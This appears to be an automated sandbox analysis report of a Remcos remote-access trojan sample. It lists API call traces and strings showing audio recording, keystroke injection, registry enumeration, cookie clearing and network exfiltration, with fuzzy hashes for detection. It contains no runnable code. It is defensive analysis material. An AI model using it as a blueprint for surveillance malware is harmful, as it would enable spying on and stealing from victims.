                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                  • API String ID: 3809562944-243156785
                                                  • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                  • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                  • int.LIBCPMT ref: 00410EBC
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 3815856325-2015055088
                                                  • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                  • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                  • waveInStart.WINMM ref: 00401CFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: dMG$|MG$PG
                                                  • API String ID: 1356121797-532278878
                                                  • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                  • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                  • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                  • __freea.LIBCMT ref: 00454083
                                                  • __freea.LIBCMT ref: 0045408F
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                  • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                  • _free.LIBCMT ref: 00445515
                                                  • _free.LIBCMT ref: 0044552E
                                                  • _free.LIBCMT ref: 00445560
                                                  • _free.LIBCMT ref: 00445569
                                                  • _free.LIBCMT ref: 00445575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                  • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                  • String ID: PkG$XMG$NG$NG
                                                  • API String ID: 1649129571-3151166067
                                                  • Opcode ID: 1244d03aaf8bbacaff6bcd482a8a3dc53dd5ad8e55aa68c7102f53e06e7dc45e
                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                  • Opcode Fuzzy Hash: 1244d03aaf8bbacaff6bcd482a8a3dc53dd5ad8e55aa68c7102f53e06e7dc45e
                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: 2cd47226940962a122a5225dbb7bcfdd0251b599784bc95ccd90888c348ec43d
                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                  • Opcode Fuzzy Hash: 2cd47226940962a122a5225dbb7bcfdd0251b599784bc95ccd90888c348ec43d
                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                  • __freea.LIBCMT ref: 0044AEB0
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • __freea.LIBCMT ref: 0044AEB9
                                                  • __freea.LIBCMT ref: 0044AEDE
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                  • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                  APIs
                                                  • SendInput.USER32 ref: 00419A25
                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16_free
                                                  • String ID: a/p$am/pm$h{D
                                                  • API String ID: 2936374016-2303565833
                                                  • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                  • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                  APIs
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • _free.LIBCMT ref: 00444E87
                                                  • _free.LIBCMT ref: 00444E9E
                                                  • _free.LIBCMT ref: 00444EBD
                                                  • _free.LIBCMT ref: 00444ED8
                                                  • _free.LIBCMT ref: 00444EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: KED
                                                  • API String ID: 3033488037-2133951994
                                                  • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                  • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$xUG$TG
                                                  • API String ID: 3554306468-1165877943
                                                  • Opcode ID: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                  • Opcode Fuzzy Hash: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                  • __fassign.LIBCMT ref: 0044B514
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: xUG$NG$NG$TG
                                                  • API String ID: 3114080316-2811732169
                                                  • Opcode ID: 7f9f9846efed95429afd307c0f7fa8f7403fdbe807f9a5f738d9a6b82af91cf8
                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                  • Opcode Fuzzy Hash: 7f9f9846efed95429afd307c0f7fa8f7403fdbe807f9a5f738d9a6b82af91cf8
                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                  APIs
                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 37874593-122982132
                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                  APIs
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: 7c352b3585a634410ab9138d6cff2a21f89007fdd3bec834ca7dbc2ca3cb0abe
                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                  • Opcode Fuzzy Hash: 7c352b3585a634410ab9138d6cff2a21f89007fdd3bec834ca7dbc2ca3cb0abe
                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                  • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                  APIs
